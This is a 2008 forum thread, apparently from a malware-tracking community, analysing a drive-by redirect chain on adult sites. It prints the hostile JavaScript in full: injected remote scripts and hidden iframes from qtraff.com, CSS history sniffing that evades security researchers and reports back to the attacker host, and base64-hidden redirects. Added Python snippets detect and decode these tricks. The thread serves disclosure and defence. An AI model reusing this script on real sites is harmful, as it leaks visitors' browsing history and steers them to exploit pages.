Author Topic: Only infect if you haven't been to malwaredomainlist.com  (Read 8154 times)

October 18, 2008, 06:45:17 pm

JohnC

Starting at http://berrykinky.com clicking a picture to go to another site.

http://berrykinky.com/st/st.php?id=13615&script=1&url=http://doctorassmaster.com/ip/69/?id=cuwydotcom&p=

Code: [Select]
<script>if(opener&&!opener.closed){sc=opener.document.createElement('script');sc.src='http://qtraff.com/js.php';opener.document.body.appendChild(sc);}</script><script>window.name='qwnew';</script><script>window.location.reload();</script><noscript><meta http-equiv='refresh' content='1; URL=/st/st.php?id=13615&script=1&url=http://doctorassmaster.com/ip/69/?id=cuwydotcom&p='></noscript>

Code: [Select]
GET /js.php HTTP/1.1
Accept: */*
Referer: http://berrykinky.com/
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: qtraff.com
Connection: Keep-Alive

Code: [Select]
ifr=window.document.createElement('iframe'); ifr.src='http://qtraff.com/fr.php'; ifr.style.visibility='hidden'; ifr.style.position='absolute'; window.document.body.appendChild(ifr);

Code: [Select]
GET /fr.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://berrykinky.com/
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: qtraff.com
Connection: Keep-Alive



Code: [Select]
<html>
<head>
<style type="text/css">
.o {visibility: hidden}
.o:visited {margin-left: 10px}
</style>
</head>
<body leftmargin="0" topmargin="0">
<a href="http://adultbizforum.com/" class="o">o</a><br>
<a href="http://adultwebmasterinfo.com/" class="o">o</a><br>
<a href="http://adultwebmastermeeting.com/" class="o">o</a><br>
<a href="http://apscripts.com/" class="o">o</a><br>
<a href="http://armadaboard.com/" class="o">o</a><br>
<a href="http://arrowscripts.com/" class="o">o</a><br>
<a href="http://askdamagex.com/" class="o">o</a><br>
<a href="http://bbs.adultwebmasterinfo.com/" class="o">o</a><br>
<a href="http://bbs.mediumpimpin.com/" class="o">o</a><br>
<a href="http://boards.xbiz.com/" class="o">o</a><br>
<a href="http://cheaterhell.com/" class="o">o</a><br>
<a href="http://chokertraffic.com/" class="o">o</a><br>
<a href="http://cj-racer.com/" class="o">o</a><br>
<a href="http://cjlog.com/" class="o">o</a><br>
<a href="http://clickzs.com/" class="o">o</a><br>
<a href="http://comusthumbs.com/" class="o">o</a><br>
<a href="http://cozyfrog.com/" class="o">o</a><br>
<a href="http://crutop.nu/" class="o">o</a><br>
<a href="http://crutop.nu/Vbulletin/" class="o">o</a><br>
<a href="http://dtrotator.com/" class="o">o</a><br>
<a href="http://fhgstore.com/" class="o">o</a><br>
<a href="http://forum.krawl.com/" class="o">o</a><br>
<a href="http://gallerytrafficservice.com/" class="o">o</a><br>
<a href="http://gallerytrafficservice.com/client/" class="o">o</a><br>
<a href="http://gofuckbiz.com/" class="o">o</a><br>
<a href="http://greenguyandjim.com/" class="o">o</a><br>
<a href="http://gtsru.com/" class="o">o</a><br>
<a href="http://jmbsoft.com/" class="o">o</a><br>
<a href="http://justblowme.com/" class="o">o</a><br>
<a href="http://krawl.com/" class="o">o</a><br>
<a href="http://linkex.dk/" class="o">o</a><br>
<a href="http://mediumpimpin.com/" class="o">o</a><br>
<a href="http://netpond.com/" class="o">o</a><br>
<a href="http://pimpboard.com/" class="o">o</a><br>
<a href="http://pornstarkings.com/" class="o">o</a><br>
<a href="http://protect-x.com/" class="o">o</a><br>
<a href="http://proton-tm.com/" class="o">o</a><br>
<a href="http://rusadult.com/" class="o">o</a><br>
<a href="http://rusawm.com/" class="o">o</a><br>
<a href="http://smart-scripts.com/" class="o">o</a><br>
<a href="http://streamscripts.com/" class="o">o</a><br>
<a href="http://submitpasses.com/" class="o">o</a><br>
<a href="http://submitter.krawl.com/submitters/" class="o">o</a><br>
<a href="http://submitter.krawl.com/submitters/submit.php" class="o">o</a><br>
<a href="http://tgpsoftware.com/" class="o">o</a><br>
<a href="http://tgpteam.com/" class="o">o</a><br>
<a href="http://trafficadept.com/" class="o">o</a><br>
<a href="http://trafficholder.com/" class="o">o</a><br>
<a href="http://trafficroup.com/" class="o">o</a><br>
<a href="http://umaxforum.com/" class="o">o</a><br>
<a href="http://www.adultbizforum.com/" class="o">o</a><br>
<a href="http://www.adultwebmasterinfo.com/" class="o">o</a><br>
<a href="http://www.adultwebmastermeeting.com/" class="o">o</a><br>
<a href="http://www.apscripts.com/" class="o">o</a><br>
<a href="http://www.armadaboard.com/" class="o">o</a><br>
<a href="http://www.arrowscripts.com/" class="o">o</a><br>
<a href="http://www.askdamagex.com/" class="o">o</a><br>
<a href="http://www.cheaterhell.com/" class="o">o</a><br>
<a href="http://www.chokertraffic.com/" class="o">o</a><br>
<a href="http://www.cj-racer.com/" class="o">o</a><br>
<a href="http://www.cjlog.com/" class="o">o</a><br>
<a href="http://www.clickzs.com/" class="o">o</a><br>
<a href="http://www.comusthumbs.com/" class="o">o</a><br>
<a href="http://www.cozyfrog.com/" class="o">o</a><br>
<a href="http://www.crutop.nu/" class="o">o</a><br>
<a href="http://www.crutop.nu/Vbulletin/" class="o">o</a><br>
<a href="http://www.dtrotator.com/" class="o">o</a><br>
<a href="http://www.fhgstore.com/" class="o">o</a><br>
<a href="http://www.gallerytrafficservice.com/" class="o">o</a><br>
<a href="http://www.gallerytrafficservice.com/client/" class="o">o</a><br>
<a href="http://www.gfy.com/" class="o">o</a><br>
<a href="http://www.gofuckbiz.com/" class="o">o</a><br>
<a href="http://www.gofuckyourself.com/" class="o">o</a><br>
<a href="http://www.greenguyandjim.com/" class="o">o</a><br>
<a href="http://www.gtsru.com/" class="o">o</a><br>
<a href="http://www.jmbsoft.com/" class="o">o</a><br>
<a href="http://www.justblowme.com/" class="o">o</a><br>
<a href="http://www.krawl.com/" class="o">o</a><br>
<a href="http://www.linkex.dk/" class="o">o</a><br>
<a href="http://www.master-x.com/" class="o">o</a><br>
<a href="http://www.master-x.com/forum/" class="o">o</a><br>
<a href="http://www.mediumpimpin.com/" class="o">o</a><br>
<a href="http://www.netpond.com/" class="o">o</a><br>
<a href="http://www.paydir.com/" class="o">o</a><br>
<a href="http://www.pimpboard.com/" class="o">o</a><br>
<a href="http://www.pornstarkings.com/" class="o">o</a><br>
<a href="http://www.protect-x.com/" class="o">o</a><br>
<a href="http://www.proton-tm.com/" class="o">o</a><br>
<a href="http://www.rusadult.com/" class="o">o</a><br>
<a href="http://www.rusawm.com/" class="o">o</a><br>
<a href="http://www.smart-scripts.com/" class="o">o</a><br>
<a href="http://www.streamscripts.com/" class="o">o</a><br>
<a href="http://www.submitpasses.com/" class="o">o</a><br>
<a href="http://www.tgpsoftware.com/" class="o">o</a><br>
<a href="http://www.tgpteam.com/" class="o">o</a><br>
<a href="http://www.trafficadept.com/" class="o">o</a><br>
<a href="http://www.trafficholder.com/" class="o">o</a><br>
<a href="http://www.trafficroup.com/" class="o">o</a><br>
<a href="http://www.umaxforum.com/" class="o">o</a><br>
<a href="http://www.xbiz.com/" class="o">o</a><br>
<a href="http://www.xclicks.net/" class="o">o</a><br>
<a href="http://www.ynot.com/" class="o">o</a><br>
<a href="http://xbiz.com/" class="o">o</a><br>
<a href="http://xclicks.net/" class="o">o</a><br>
<a href="http://www.malwaredomainlist.com/" class="o">o</a><br>
<a href="http://www.malwaredomainlist.com/mdl.php" class="o">o</a><br>
<a href="http://www.malwaredomainlist.com/update.php" class="o">o</a><br>
<a href="http://viruslist.com/" class="o">o</a><br>
<a href="http://www.viruslist.com/" class="o">o</a><br>
<a href="http://cleanthe.net/" class="o">o</a><br>
<a href="http://www.cleanthe.net/" class="o">o</a><br>
<a href="http://vpornmovies.com/t1.php" id="qwlink" target="qwnew">click</a>
<script>
var bad=0;
var dom=new String();
for (var s=0;s<document.links.length;s++){
if (document.links[s].className=='o' && document.links[s].offsetLeft>=10){
bad=1;
dom=document.links[s].href;
break;
}
}
if (bad==0) {
setTimeout("document.getElementById('qwlink').click();", 3000);
}
else document.write("<link href='http://qtraff.com/addip.php?dom="+dom+"' rel='stylesheet'>");
</script>
</body>


From that point if it doesn't find any of those sites, it will redirect you a couple more times before ending up on an exploit site.
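
Added example, not part of the original posts: a static triage check in Python for the pattern shown in the page above, where a `:visited` rule shifts a link's position and script then reads link geometry such as `offsetLeft`. The sample page and its `.example` hosts are constructed, and `find_history_sniffing` is a hypothetical name.

```python
import re
from html.parser import HTMLParser

# A class-scoped :visited rule, and declarations that move or resize the element.
VISITED_RULE = re.compile(r"\.([\w-]+):visited\s*\{([^}]*)\}", re.I)
LAYOUT_DECL = re.compile(r"(?:^|;)\s*(?:margin|padding|left|top|right|bottom|width|height)[-\w]*\s*:", re.I)
# Script-side reads that turn the moved link back into a yes/no answer.
GEOMETRY_READ = re.compile(r"\b(offsetLeft|offsetTop|offsetWidth|offsetHeight|getComputedStyle|currentStyle)\b")


class _Anchors(HTMLParser):
    """Collect (class, href) for every <a> present in the static markup."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            a = dict(attrs)
            self.links.append((a.get("class") or "", a.get("href") or ""))


def find_history_sniffing(page):  # hypothetical helper name
    # Classes whose :visited rule changes layout, so visited state leaks into geometry.
    classes = {m.group(1) for m in VISITED_RULE.finditer(page)
               if LAYOUT_DECL.search(m.group(2))}
    reads = sorted(set(GEOMETRY_READ.findall(page)))
    parser = _Anchors()
    parser.feed(page)
    probed = [href for cls, href in parser.links if set(cls.split()) & classes]
    return {"suspicious": bool(classes and reads), "classes": sorted(classes),
            "geometry_reads": reads, "probed_urls": probed}


# Constructed sample modelled on the structure quoted in the post; hosts are placeholders.
SAMPLE = """<style>.o {visibility: hidden} .o:visited {margin-left: 10px}</style>
<a href="http://researcher.example/" class="o">o</a>
<a href="http://blocklist.example/list.php" class="o">o</a>
<a href="http://next-hop.example/t1.php" id="qwlink">click</a>
<script>for (var s=0;s<document.links.length;s++){
 if (document.links[s].className=='o' && document.links[s].offsetLeft>=10){ bad=1; }
}</script>"""
BENIGN = "<style>.nav:visited {color: purple}</style><a class='nav' href='http://site.example/'>x</a>"

if __name__ == "__main__":
    print(find_history_sniffing(SAMPLE))
    print(find_history_sniffing(BENIGN))
```

When the links are written by script instead of static markup, `probed_urls` comes back empty but the CSS rule and the geometry read are still flagged.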

October 19, 2008, 01:10:06 pm
Reply #1

sowhat-x

  • Guest
...so they're afraid of MDL, Kaspersky and CleanThe.net? Lmao... they are at least ridiculous...  :D
And pretty much the easiest way to get rid of stupid tricks like this:
https://addons.mozilla.org/en-US/firefox/addon/1999

April 30, 2009, 02:40:48 pm
Reply #2

JohnC

A newer version, code is changed slightly but does the same thing.

http://lifeporn.net
http://lifeporn.net/t/html.php?script=js

Code: [Select]
document.write("<style type='text/css'>.u96{visibility:hidden;position:absolute;}.u96:link{visibility:hidden;position:absolute;left:0px}.u96:visited{visibility:hidden;left:10px}.u97{visibility:hidden;position:absolute;}.u97:link{visibility:hidden;position:absolute;left:0px;}.u97:visited{visibility:hidden;position:absolute;left:10px;}</style>");var url=new Array();
url[0]='http://adultwebmasterinfo.com/';
url[1]='http://www.adultwebmasterinfo.com/';
url[2]='http://adultwebmastermeeting.com/';
url[3]='http://www.adultwebmastermeeting.com/';
url[4]='http://apscripts.com/';
url[5]='http://www.apscripts.com/';
url[6]='http://armadaboard.com/';
url[7]='http://www.armadaboard.com/';
url[8]='http://arrowscripts.com/';
url[9]='http://www.arrowscripts.com/';
url[10]='http://askdamagex.com/';
url[11]='http://www.askdamagex.com/';
url[12]='http://cheaterhell.com/';
url[13]='http://www.cheaterhell.com/';
url[14]='http://chokertraffic.com/';
url[15]='http://www.chokertraffic.com/';
url[16]='http://cj-racer.com/';
url[17]='http://www.cj-racer.com/';
url[18]='http://cjlog.com/';
url[19]='http://www.cjlog.com/';
url[20]='http://clickzs.com/';
url[21]='http://www.clickzs.com/';
url[22]='http://comusthumbs.com/';
url[23]='http://www.comusthumbs.com/';
url[24]='http://cozyfrog.com/';
url[25]='http://www.cozyfrog.com/';
url[26]='http://crutop.nu/';
url[27]='http://www.crutop.nu/';
url[28]='http://crutop.nu/Vbulletin/';
url[29]='http://www.crutop.nu/Vbulletin/';
url[30]='http://dtrotator.com/';
url[31]='http://www.dtrotator.com/';
url[32]='http://fhgstore.com/';
url[33]='http://www.fhgstore.com/';
url[34]='http://gallerytrafficservice.com/';
url[35]='http://www.gallerytrafficservice.com/';
url[36]='http://gallerytrafficservice.com/client/';
url[37]='http://www.gallerytrafficservice.com/client/';
url[38]='http://gofuckbiz.com/';
url[39]='http://www.gofuckbiz.com/';
url[40]='http://greenguyandjim.com/';
url[41]='http://www.greenguyandjim.com/';
url[42]='http://gtsru.com/';
url[43]='http://www.gtsru.com/';
url[44]='http://jmbsoft.com/';
url[45]='http://www.jmbsoft.com/';
url[46]='http://justblowme.com/';
url[47]='http://www.justblowme.com/';
url[48]='http://klikforum.com/';
url[49]='http://www.klikforum.com/';
url[50]='http://krawl.com/';
url[51]='http://www.krawl.com/';
url[52]='http://linkex.dk/';
url[53]='http://www.linkex.dk/';
url[54]='http://mediumpimpin.com/';
url[55]='http://www.mediumpimpin.com/';
url[56]='http://netpond.com/';
url[57]='http://www.netpond.com/';
url[58]='http://pimpboard.com/';
url[59]='http://www.pimpboard.com/';
url[60]='http://pornstarkings.com/';
url[61]='http://www.pornstarkings.com/';
url[62]='http://protect-x.com/';
url[63]='http://www.protect-x.com/';
url[64]='http://proton-tm.com/';
url[65]='http://www.proton-tm.com/';
url[66]='http://rusadult.com/';
url[67]='http://www.rusadult.com/';
url[68]='http://rusawm.com/';
url[69]='http://www.rusawm.com/';
url[70]='http://smart-scripts.com/';
url[71]='http://www.smart-scripts.com/';
url[72]='http://streamscripts.com/';
url[73]='http://www.streamscripts.com/';
url[74]='http://submitpasses.com/';
url[75]='http://www.submitpasses.com/';
url[76]='http://tgpsoftware.com/';
url[77]='http://www.tgpsoftware.com/';
url[78]='http://tgpteam.com/';
url[79]='http://www.tgpteam.com/';
url[80]='http://trafficadept.com/';
url[81]='http://www.trafficadept.com/';
url[82]='http://trafficholder.com/';
url[83]='http://www.trafficholder.com/';
url[84]='http://trafficroup.com/';
url[85]='http://www.trafficroup.com/';
url[86]='http://umaxforum.com/';
url[87]='http://www.umaxforum.com/';
url[88]='http://xbiz.com/';
url[89]='http://www.xbiz.com/';
url[90]='http://xclicks.net/';
url[91]='http://www.xclicks.net/';
url[92]='http://ynot.com/';
url[93]='http://www.ynot.com/';
url[94]='http://viruslist.com/';
url[95]='http://www.viruslist.com/';
url[96]='http://malwaredomainlist.com/mdl.php';
url[97]='http://www.malwaredomainlist.com/mdl.php';
url[98]='http://x2more.com';
url[99]='http://www.x2more.com';
url[100]='http://x2more.com/checker';
url[101]='http://www.x2more.com/checker';
url[102]='http://cjwebmasters.com';
url[103]='http://www.cjwebmasters.com';
url[104]='http://deluxepass.com';
url[105]='http://www.deluxepass.com';
url[106]='http://epassporte.com';
url[107]='http://www.epassporte.com';
url[108]='http://statsremote.com';
url[109]='http://www.statsremote.com';
url[110]='http://submitter.krawl.com/submitters/submit.php';
url[111]='http://bbs.adultwebmasterinfo.com/';
url[112]='http://bbs.mediumpimpin.com/';
url[113]='http://forum.krawl.com/';
url[114]='http://boards.xbiz.com/';
var b11=0,t11='',g11=0;var b12=0,t12='',g12=0;var lin;for (var s=0;s<url.length;s++){document.write("<a href='"+url[s]+"' class='u96' id='l"+s+"'>"+url[s]+"</a>");lin=document.getElementById("l"+s);if(lin.offsetLeft>0){b11=url[s];t11=s;g11=1;break;}};if(g11==1){window.document.write("<scr"+"ipt src='http://www.lifeporn.net/t/html.php?addip="+b11+"&type="+t11+"'></scr"+"ipt>");}else if(g11==0){if(opener&&!opener.closed){window.opener.location.replace('http://lifeporn.net/');window.location.href='http://ahmilf.com/r/r.php?l=2';}opener=0;}else if(g11==0&&g12==0){}

http://ahmilf.com/r/r.php?l=2

Code: [Select]
<html><body onLoad="document.qwer.submit()">
<form action='/' method=post name="qwer">
<input type=hidden name=qwerty value='lfdshsdljflsd'>
<input type=hidden name=r value='aHR0cDovL3d3dy50cmFmZmljaG9sZGVyLmNvbS9pbi9pbi5waHA/a29yb2Vk'>
</form></body></html>

http://lifeporn.net/r/r.php?h=2&a=65bf9b73b0e93836b908dd4a5a9275f9
http://lifeporn.net/r/r.php?gthbnjybn=aHR0cDovL3d3dy50cmFmZmljaG9sZGVyLmNvbS9pbi9pbi5waHA%2FbGlmZXBvcm4%3D&r=1

http://www.trafficholder.com/in/in.php?lifeporn

TrafficHolder is a third-party site; it is for selling/buying traffic. Some of the URLs you may be directed to are legitimate, some may be malicious. You can see the affiliate ID "lifeporn" at the end of the URL. It is one of the many sites that traffic traders use for their TGPs to make money.
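
Added example, not part of the original posts: the hidden form field and the redirect parameter quoted in the reply above carry their destination as base64, and this Python helper recovers it when tracing such a chain. `decode_if_url` and `hidden_destinations` are hypothetical names; both inputs are copied from the reply.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl

HIDDEN_INPUT = re.compile(
    r"<input[^>]*\bname=['\"]?([\w-]+)['\"]?[^>]*\bvalue=['\"]([^'\"]*)['\"]", re.I)


def decode_if_url(value):
    """Return the decoded text if value is base64 for an http(s) URL, else None."""
    candidate = value.replace(" ", "+")          # parse_qsl turns '+' into a space
    candidate += "=" * (-len(candidate) % 4)     # tolerate stripped padding
    try:
        text = base64.b64decode(candidate, validate=True).decode("ascii")
    except ValueError:                           # bad base64 or non-ASCII bytes
        return None
    return text if text.startswith(("http://", "https://")) else None


def hidden_destinations(artifact):
    """Map parameter name -> decoded URL for a redirect URL or an auto-submitting form."""
    if artifact.lstrip().startswith("<"):
        pairs = HIDDEN_INPUT.findall(artifact)
    else:
        pairs = parse_qsl(urlsplit(artifact).query, keep_blank_values=True)
    found = {}
    for name, value in pairs:
        decoded = decode_if_url(value)
        if decoded:
            found[name] = decoded
    return found


# Both inputs are copied from the reply above.
FORM = """<form action='/' method=post name="qwer">
<input type=hidden name=qwerty value='lfdshsdljflsd'>
<input type=hidden name=r value='aHR0cDovL3d3dy50cmFmZmljaG9sZGVyLmNvbS9pbi9pbi5waHA/a29yb2Vk'>
</form>"""
REDIRECT = ("http://lifeporn.net/r/r.php?gthbnjybn="
            "aHR0cDovL3d3dy50cmFmZmljaG9sZGVyLmNvbS9pbi9pbi5waHA%2FbGlmZXBvcm4%3D&r=1")

if __name__ == "__main__":
    print(hidden_destinations(FORM))
    print(hidden_destinations(REDIRECT))
```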